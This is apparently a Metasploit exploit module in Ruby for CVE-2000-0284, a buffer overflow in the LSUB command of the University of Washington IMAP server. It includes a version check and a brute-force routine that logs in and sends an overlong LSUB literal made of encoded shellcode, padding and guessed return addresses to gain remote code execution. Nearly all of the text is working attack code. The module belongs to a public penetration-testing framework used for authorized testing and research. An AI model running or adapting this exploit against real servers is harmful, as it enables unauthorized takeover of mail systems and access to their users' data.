## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Brute include Msf::Exploit::Remote::Imap def initialize(info = {}) super(update_info(info, 'Name' => 'UoW IMAP Server LSUB Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow in the 'LSUB' command of the University of Washington IMAP service. This vulnerability can only be exploited with a valid username and password. }, 'Author' => [ 'aushack', 'jduck' ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2000-0284' ], [ 'OSVDB', '12037' ], [ 'BID', '1110' ], [ 'EDB', '284' ] ], 'Privileged' => false, 'Payload' => { 'Space' => 964, 'BadChars' => "\x00\x0a\x0d\x2f", 'StackAdjustment' => -3500, }, 'Platform' => 'linux', 'Targets' => [ # ['RedHat 6.2 - IMAP4rev1 v12.264', { 'Ret' => 0xbffff310 }], [ 'Linux Bruteforce', { 'Platform' => 'linux', 'Offset' => 1064, 'Bruteforce' => { 'Start' => { 'Ret' => 0xbffffdfc }, 'Stop' => { 'Ret' => 0xbfa00000 }, 'Step' => 200 } }, ] ], 'DisclosureDate' => '2000-04-16', 'DefaultTarget' => 0)) end def check connect disconnect if (banner =~ /IMAP4rev1 v12\.264/) return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end def brute_exploit(addresses) print_status("Trying 0x%.8x ..." % addresses['Ret']) if (not connect_login) fail_with(Failure::Unknown, "Unable to log in!") end req = "a002 LSUB \"\" {%d}\r\n" % target['Offset'] sock.put(req) buf = sock.get_once sploit = payload.encoded + rand_text_alphanumeric(64) + [addresses['Ret']].pack('V') + rand_text_alphanumeric(32) + "\r\n" sock.put(sploit) handler disconnect end end